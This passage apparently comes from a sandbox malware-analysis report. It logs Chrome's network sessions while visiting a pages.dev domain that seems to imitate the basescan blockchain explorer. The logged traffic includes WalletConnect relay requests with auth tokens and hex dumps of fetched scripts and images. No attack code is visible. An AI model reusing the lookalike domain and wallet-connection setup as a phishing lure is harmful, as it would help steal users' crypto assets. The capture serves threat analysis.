                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 7464
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2cd9eae4235-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 17868
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cf1ApOabfxxTRxuFHP4nttwOIZUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=431+16 c=0+16 v=2024.9.3 l=7464 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC588INData Raw: 52 49 46 46 20 1d 00 00 57 45 42 50 56 50 38 20 14 1d 00 00 f0 96 00 9d 01 2a 90 01 90 01 3e 49 22 8e 44 a2 a2 21 95 ac 0c 64 28 04 84 a6 ef c3 25 86 9c 27 e1 76 be 52 c0 7d ff 31 fd 5f f7 03 c3 13 10 75 3f ee ff b0 9f da 3f 66 3e 83 78 27 ab 1e db 77 87 fa af ec 8f 4c ed a3 e7 01 e1 5f 9a ff b7 ff 37 fd df f7 6f e8 67 f9 3f 52 df c3 7f d2 7b 01 ff 11 fe 11 fe 2b f9 bf f7 2f fb df d5 ff ff ff ff fc ff e8 1f fa 2f a0 0f e4 bf e2 3f 6c bf f5 fc 3b 7f ae ff 81 fd cb de 57 fd 0f 51 6f f0 7f f8 bd 7f 7d 49 3d 06 7f 6a bd 5c 7f f9 fe ed 7c 2b 7e db 7e dc 7f da f9 09 fd 4e ff ff fc e7 b7 ff a5 9f ab 1f e8 bb 66 ff 01 f9 09 fd 4f b4 db cb 7e cf 7c 78 e2 2e d1 ff 99 fd f5 fd d7 f6 9f 4d fb d7 f9 23 a8 2f e2 5f c6 7f ac ff 44 fd d8 fe af f0 c3 12 fe 5b c9 87 e7 0f
                                                                                                                                                                                                                                              Data Ascii: RIFF WEBPVP8 *>I"D!d(%'vR}1_u??f>x'wL_7og?R{+//?l;WQo}I=j\|+~~NfO~|x.M#/_D[
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ea bf 0f dd 2d 7d 60 74 99 d6 f5 8c d9 ef 77 0f f1 42 77 9d 6a ff fc 9c 16 03 f3 03 16 63 29 83 26 9f 26 e7 5c ab 82 f0 4a 96 0d 26 cf 49 34 e6 5f a9 a4 1a 32 90 17 ee ad 0e 95 a0 84 f1 63 75 11 16 b6 b4 e7 27 db c6 e0 2a b3 d1 ee df 96 51 f9 a9 2a 82 bb d6 29 de 16 10 09 e4 87 ef 5a 26 aa 56 fe c4 1d 90 ab 17 9c 8c ee 8b db db f9 9b 61 eb 30 b0 48 29 61 47 c4 4f 44 bf 49 4a c5 b2 2e ec 34 95 44 36 5a 08 92 13 f4 5d aa 8a e5 3d 4f 42 95 7c 3e 55 4b 4e 75 26 0f 35 55 15 87 f6 7d bc ff c9 30 68 15 f6 24 bf 9c 51 39 44 8f b5 19 5b e1 29 1d 05 43 35 dd fe 8b 3c 1f 96 be ab 67 fd 24 ad cd ff c5 b5 93 4e 31 3f fc 59 64 a4 fb 33 d6 ff c9 4f db 56 cf 7c ce 63 29 90 e0 62 3c b9 94 fa 85 78 be c1 c1 be 05 ed 9f 4e ee 55 0b a3 af ba 50 a2 50 e8 ca a6 14 ac 61 bd c2
                                                                                                                                                                                                                                              Data Ascii: -}`twBwjc)&&\J&I4_2cu'*Q*)Z&Va0H)aGODIJ.4D6Z]=OB|>UKNu&5U}0h$Q9D[)C5<g$N1?Yd3OV|c)b<xNUPPa
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: ae 0a f8 80 30 9f 40 9a 5e 49 a9 93 29 bf ca 0b ff ed c9 33 a0 b2 58 1d 9d 93 0d fc 94 14 6d f6 ff 84 ed 89 91 21 8e d4 47 89 6b b0 36 c3 fe 9b f4 fd eb ad a9 98 a6 bf b2 a6 0d 14 5c 97 4f 02 49 47 dd c1 e1 e6 f9 99 3e 42 93 c4 ec 10 f0 2a a3 6c 9f 54 8b ca 5f bc 37 1e c2 b0 f1 31 da 4c a0 22 59 4d 13 84 10 80 ed e1 d7 c2 48 5b 6e 30 ed 65 c2 ef 2c b6 42 c8 14 93 d7 1a 9a e2 ed 27 c4 86 2c 77 ef ec 8a 33 e1 01 f5 c2 34 98 01 59 c1 fc 76 d1 04 6d ca a2 63 91 a7 54 32 47 cf 73 6f a8 09 af 70 0b 0f 78 a5 96 61 ee 5d 0a d5 1f 7e 09 f3 e6 a0 63 fb 6a f0 e7 5a 51 89 1e 83 55 17 6a 4d 4b 5b 50 c0 40 0f e8 6c 6c 0d 76 09 38 d7 02 34 5e 2c 35 8e 93 ac 43 b3 67 f7 a4 44 10 39 f6 b6 ab 69 9a 27 1e 44 5d 73 ea 08 bb 17 65 65 d6 31 d7 9e 2f d5 8a 15 b8 ab 1e 80 b1 1b
                                                                                                                                                                                                                                              Data Ascii: 0@^I)3Xm!Gk6\OIG>B*lT_71L"YMH[n0e,B',w34YvmcT2Gsopxa]~cjZQUjMK[P@llv84^,5CgD9i'D]see1/
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f7 1b eb 2a c4 1a 72 86 92 24 05 0f 8a 1d 48 0b f7 14 d9 13 34 bc fc 16 17 1f 70 e4 ff d1 41 03 0f 75 a9 96 ee 91 3f 74 a2 bb b0 33 4e 5a ac 04 b3 5e 2d f8 4c e4 91 da 87 b5 50 24 04 e5 0b 4f 65 f8 26 3b 9c f7 30 65 b0 71 f6 d2 b9 ec eb 6d 7d 96 9d 91 27 4f b5 1b 55 ec 6b f4 6a 4a 94 96 2d 04 59 e2 16 55 b3 0b df f9 70 ed 51 7a 32 5c 78 70 4e 94 61 8c 3b 82 af 6f 47 dc f4 78 6e 50 23 d5 ad 96 4e c0 90 1a b9 12 fc da b8 a4 05 d9 5a 89 bd d1 af 34 bd 04 27 49 52 59 c7 fc 9f a6 ec 5c c7 2b 8d 5c ae 52 f4 dc 65 e5 1a be 8d db 41 a2 b4 49 27 dc 2b c8 dc ae 9e 4a 33 cf 8a 7a e6 6c 57 12 e2 40 06 07 37 fe 1f d7 87 f5 8a 4c d8 2a 29 0d 9f 44 4d 3c d1 23 32 e1 4e 57 38 7c 3d 18 8d 36 36 13 bb 9c 59 4e ba 1b 48 ad 6d 17 eb 25 84 a6 3b e1 7d 66 fa 07 bb 9f ff 44 77
                                                                                                                                                                                                                                              Data Ascii: *r$H4pAu?t3NZ^-LP$Oe&;0eqm}'OUkjJ-YUpQz2\xpNa;oGxnP#NZ4'IRY\+\ReAI'+J3zlW@7L*)DM<#2NW8|=66YNHm%;}fDw
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 8c 4d df 64 6b 76 eb 2e ba 08 48 2d 67 65 4b 95 fc 49 dc da be 5d 29 e9 13 54 69 2c 02 55 ea 3f 3b 8e ca 42 5b 36 99 81 1b a1 35 6c 28 73 72 16 22 04 45 cb 97 7e 2c c3 0c b6 c3 3c 5f 4f ba 4e 15 4a 04 28 6e 7e 17 99 cf 5d 99 d9 09 b1 c6 67 ce be 04 24 0e 9a 58 33 23 9c ea ab b9 56 70 b9 48 92 ee 76 d0 16 95 47 58 67 54 c4 4b d2 d3 53 6e 1b f5 a6 bc 08 f5 95 8f d3 e8 a3 9f 65 1e d8 eb 42 4f 65 ae 43 f9 c6 32 85 68 81 ac f6 fc aa 51 dc 93 3c b6 eb 92 c4 03 1c 71 df ed 21 03 a1 95 5b c6 3e 92 14 a2 d3 61 dd a7 67 18 3a be 17 24 a8 03 7b 0f 4b 59 cf 0b 62 d4 6e da e4 7b 48 fc ca af e6 e7 2c 4a a2 c0 c5 ef a3 54 c1 79 fe 14 2c c0 53 08 06 91 2b fb fb ce 6a d7 7a bc c7 6e f4 7f eb 01 10 d1 45 d1 0f e4 94 7c 58 01 b2 ec 7a 67 d4 bd f9 7b 8e a4 d1 9f 3d 90 84 01
                                                                                                                                                                                                                                              Data Ascii: Mdkv.H-geKI])Ti,U?;B[65l(sr"E~,<_ONJ(n~]g$X3#VpHvGXgTKSneBOeC2hQ<q![>ag:${KYbn{H,JTy,S+jznE|Xzg{=
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 85 8b de b3 e4 9c 02 d4 ef 6c ba f8 21 60 04 ca b8 23 b7 a7 10 90 ac e5 dd 27 87 39 c3 2f bd a3 6a 58 7e 58 8b 19 df 4f 2c b3 52 fb ee 3d 13 6b 50 17 97 42 07 50 1d 68 1f 1f ee ea b7 64 e4 19 18 37 21 3e 96 5f 0e 5b f5 b7 38 3b 07 59 a9 d5 76 27 71 07 fb 58 a7 f5 0d 10 c3 18 55 76 b4 b9 e7 0c 83 f2 aa f5 4b 07 ef 3e 77 b5 f3 a3 9b 89 00 7a 2e 4e ee e2 01 48 39 0a d8 65 48 fd 6c 76 1f 22 13 3c 07 fa b4 a3 a6 5d 36 99 81 27 46 89 af 38 75 fe 5b 62 15 31 49 64 58 08 3f 70 af c9 72 a7 44 a5 02 14 86 6c 3a b3 0f b1 37 ec 65 c4 c1 95 6d b0 f4 c4 a6 69 68 50 ea f1 1f 3a 39 18 90 46 a9 db 23 d4 fb e9 6e 6c f6 b9 9b 79 0f ea 26 6a f6 c0 77 ce 53 b2 ab dc 8e 8b 52 6b fe be 9e a3 49 fe 27 db 14 36 84 f0 a3 e4 eb 29 24 a9 25 20 29 4f c1 c5 17 01 f4 3b 74 3c f6 5f ed
                                                                                                                                                                                                                                              Data Ascii: l!`#'9/jX~XO,R=kPBPhd7!>_[8;Yv'qXUvK>wz.NH9eHlv"<]6'F8u[b1IdX?prDl:7emihP:9F#nly&jwSRkI'6)$% )O;t<_
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC31INData Raw: ba e2 94 83 6f 4d 44 77 9f 07 c1 cc f6 dc 23 32 f2 58 3d ae 01 39 4c 1e 20 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: oMDw#2X=9L


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              56192.168.2.549793104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC625OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 1239
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 09:13:42 GMT
                                                                                                                                                                                                                                              ETag: "66f525c6-4d7"
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QO8xIXY2DfRU%2F7%2FWiWKzaD5jxMefYKGv5OsJB%2FQ9U1dse2jVkwnMffCTj2EqRpFCTutoKIZa%2Bj2CxLUZwGVcSQn1qGI86ECQsV7NcL6E1%2BTSxG8n1NlxfIuTvnHcEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cdaac518bc-EWR
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              Expires: Mon, 30 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Cache-Control: max-age=172800
                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC617INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC622INData Raw: 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e
                                                                                                                                                                                                                                              Data Ascii: f,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              57192.168.2.5497783.66.52.2054435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1157OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWtqZkVuWFNaR2RzR1l3QTN5dmVkUnRRZnpBZ1NEODVjVjRLUHBVNXhqeTcyRSIsInN1YiI6IjVjMzQ3MzE1NDY0OWY4NDFhYjQ0ZjE3N2E0MGM1ZDZmZTY0OWQzYzk2ZDBmZDA5NzM3N2ZhYTE4ZGNiMWI0MWQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcyNzQ4NjE2MiwiZXhwIjoxNzI3NTcyNTYyfQ.Ke-mXGsyV6xavoL7Shk1MHLzpnu4Dz-9KeNXtj9owYsqLPDdleE7CcrEGiUTrir_-fLvec3xjqMQGI7b_xaFCQ&projectId=9a504add1206ecb902aee52264862b81&ua=wc-2%2Fjs-2.10.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Abasescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev&useOnCloseEvent=true HTTP/1.1
                                                                                                                                                                                                                                              Host: relay.walletconnect.com
                                                                                                                                                                                                                                              Connection: Upgrade
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Upgrade: websocket
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Sec-WebSocket-Key: F3My92LcU7wBXCIxlJ5D5g==
                                                                                                                                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC126INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                              date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                                                                                                                                                                                              Data Ascii: Connection header did not include 'upgrade'


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              58192.168.2.549785172.67.69.2504435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC601OUTGET /d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php HTTP/1.1
                                                                                                                                                                                                                                              Host: eas.etherscan.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 4330
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: 033e0828aecd8a15c31181716c4b1552
                                                                                                                                                                                                                                              Expire: Sat, 28 Sep 2024 02:16:04 GMT
                                                                                                                                                                                                                                              Cache-Control: private, max-age=3600
                                                                                                                                                                                                                                              P3P: CP="CUR ADM OUR NOR STA NID"
                                                                                                                                                                                                                                              Set-Cookie: OAGEO=2%7CUS%7CNA%7C%7CNew%20York%7C10118%7C40.7123%7C-74.0068%7C20%7CAmerica%2FNew_York%7C501%7CNY%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/; secure; SameSite=none
                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1WEVg6aQ1Koa%2Blx6w0zzJyS0aQ%2FZpAHGizkHwOrA27nFwb2B7ropTezQq2xqaCAORMkjSeZMVzVGuK2sMgJEswfUmmqWbRBxATg60PxOTv2Bqr8nYjGNnF2REvcd3DA9EHx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cec8cd42c4-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC489INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 64 2c 63 29 7b 76 61 72 20 61 3d 22 30 33 33 65 30 38 32 38 61 65 63 64 38 61 31 35 63 33 31 31 38 31 37 31 36 63 34 62 31 35 35 32 22 3b 63 2e 72 65 76 69 76 65 41 73 79 6e 63 3d 63 2e 72 65 76 69 76 65 41 73 79 6e 63 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 2e 43 75 73 74 6f 6d 45 76 65 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 75 6e 63 74 69 6f 6e 20 67 28 69 2c 6a 29 7b 6a 3d 6a 7c 7c 7b 62 75 62 62 6c 65 73 3a 66 61 6c 73 65 2c 63 61 6e 63 65 6c 61 62 6c 65 3a 66 61 6c 73 65 2c 64 65 74 61 69 6c 3a 75 6e 64 65 66 69 6e 65 64 7d 3b 76 61 72 20 68 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74
                                                                                                                                                                                                                                              Data Ascii: (function(d,c){var a="033e0828aecd8a15c31181716c4b1552";c.reviveAsync=c.reviveAsync||{};(function(e){if(typeof e.CustomEvent==="function"){return false}function g(i,j){j=j||{bubbles:false,cancelable:false,detail:undefined};var h=document.createEvent("Cust
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 35 70 74 36 6b 72 22 2c 79 77 70 7a 3a 30 2c 6d 61 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 67 3d 66 61 6c 73 65 3b 74 72 79 7b 69 66 28 21 67 29 7b 67 3d 74 72 75 65 3b 64 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 66 61 6c 73 65 29 3b 63 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 65 2c 66 61 6c 73 65 29 3b 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 74 61 72 74 22 2c 66 2e 73 74 61 72 74 29 3b 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 66 72 65 73 68 22 2c 66 2e 72 65 66 72 65 73 68 29 3b 66 2e 64 69 73 70 61 74 63 68 45 76
                                                                                                                                                                                                                                              Data Ascii: t5pt6kr",ywpz:0,main:function(){var e=function(){var g=false;try{if(!g){g=true;d.removeEventListener("DOMContentLoaded",e,false);c.removeEventListener("load",e,false);f.addEventListener("start",f.start);f.addEventListener("refresh",f.refresh);f.dispatchEv
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 33 64 33 2f 5a 47 56 73 61 58 5a 6c 63 6e 6b 2f 59 58 4e 35 62 6d 4e 7a 63 47 4d 3d 2e 70 68 70 22 3b 67 2e 65 6d 39 75 5a 57 6c 6b 3d 67 2e 65 6d 39 75 5a 57 6c 6b 2e 6a 6f 69 6e 28 22 7c 22 29 3b 67 2e 6c 6f 63 3d 64 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 64 2e 72 65 66 65 72 72 65 72 29 7b 67 2e 72 65 66 65 72 65 72 3d 64 2e 72 65 66 65 72 72 65 72 7d 66 2e 61 6a 61 78 28 65 2c 67 29 7d 7d 2c 64 65 74 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6e 73 5b 22 2b 66 2e 67 65 74 44 61 74 61 41 74 74 72 28 22 69 64 22 29 2b 22 3d 27 22 2b 61 2b 22 27 5d 22 29 3b 76 61 72 20 6c 3d 7b 65 6d 39 75 5a 57 6c 6b 3a 5b 5d 2c 70 72 65 66 69 78 3a 66 2e 6e 61 6d 65 2b 22
                                                                                                                                                                                                                                              Data Ascii: 3d3/ZGVsaXZlcnk/YXN5bmNzcGM=.php";g.em9uZWlk=g.em9uZWlk.join("|");g.loc=d.location.href;if(d.referrer){g.referer=d.referrer}f.ajax(e,g)}},detect:function(){var e=d.querySelectorAll("ins["+f.getDataAttr("id")+"='"+a+"']");var l={em9uZWlk:[],prefix:f.name+"
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1103INData Raw: 2f 62 6f 64 79 3e 22 29 3b 68 2e 77 72 69 74 65 6c 6e 28 22 3c 2f 68 74 6d 6c 3e 22 29 3b 68 2e 63 6c 6f 73 65 28 29 7d 2c 73 70 63 3a 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 22 72 65 63 65 69 76 65 22 2c 6c 29 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 6c 29 7b 69 66 28 6c 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 29 7b 76 61 72 20 70 3d 6c 5b 65 5d 3b 76 61 72 20 6f 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 76 61 72 20 6e 3d 6f 2e 63 6c 6f 6e 65 4e 6f 64 65 28 66 61 6c 73 65 29 3b 69 66 28 70 2e 69 66 72 61 6d 65 46 72 69 65 6e 64 6c 79 29 7b 76 61 72 20 6b 3d 66 2e 63 72 65 61 74 65 46 72 61 6d 65 28 70 29 3b 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28
                                                                                                                                                                                                                                              Data Ascii: /body>");h.writeln("</html>");h.close()},spc:function(l){this.dispatchEvent("receive",l);for(var e in l){if(l.hasOwnProperty(e)){var p=l[e];var o=d.getElementById(e);if(o){var n=o.cloneNode(false);if(p.iframeFriendly){var k=f.createFrame(p);n.appendChild(


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              59192.168.2.549795104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
